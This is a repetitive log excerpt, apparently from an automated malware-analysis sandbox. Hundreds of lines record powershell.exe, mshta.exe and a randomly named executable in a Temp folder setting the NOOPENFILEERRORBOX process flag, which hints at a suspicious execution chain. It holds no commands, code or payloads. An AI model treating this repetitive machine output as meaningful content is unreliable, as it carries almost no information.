Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\TempLPEYOVMXTE8DNJMB3DS1VE67IDCWRTFQ.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
